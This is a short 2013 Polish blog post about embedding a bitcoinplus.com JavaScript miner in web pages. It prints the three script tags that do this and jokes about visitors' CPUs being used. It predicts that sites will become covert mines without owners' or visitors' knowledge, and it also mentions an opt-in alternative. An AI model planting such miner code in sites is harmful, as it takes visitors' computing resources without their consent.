środa, 5 czerwca 2013

Generowanie bitconów za pomocą JavaScript

Nadeszła pora na generowanie bitcoinów w przeglądarce internetowej. W ten oto sposób dzięki odwiedzającym naszą stronę możemy mnożyć swój wirtualny majątek. Fakt, użytkownicy/czytelniczy takich stron mogą się nieco zdziwić że ich CPU jest troszkę za mocno używane no ale życie górnika nie jest łatwe ;)

Na stronie http://www.bitcoinplus.com/miner/embeddable pojawiła się informacja o tym, w jak prosty sposób  możemy kopać bitcoiny za pomocą JavaScriptu oraz przeglądarki internetowej.

Wszystko zostało opisane na wyżej wymienionej stronie internetowej i sprowadza się do dodania do kodu HTML trzech zewnętrznych skryptów:


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
<script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner("donny@bitcoinplus.com")</script>


Prosto i przyjemnie (-: gdyby nie podatek, o którym piszą twórcy skryptu

The fee is 19%. If you add a link to Bitcoin Plus, there is a 4% discount on the fee, bringing it down to 15%. This link must go immediately before the script tag containing the BitcoinPlusMiner call:


Jak działa? Nie wiem, nie używałem ale zastosowań jest cała masa. Czyli oprócz stron, które niechcący - bez wiedzy ich właścicieli -  rozprowadzają malware pewnie za chwilę (jeśli nie już) pokażą się strony, które zostaną - bez wiedzy ich właścicieli oraz osób odwiedzających - kopalnią bitcoinów ;)

Oczywiście, można też wykorzystać to bardziej ludzko i pozwolić kopać tym co chcą, a nie każdemu automatycznie ale zapewne tych ludzkich stron będzie o wiele mniej :)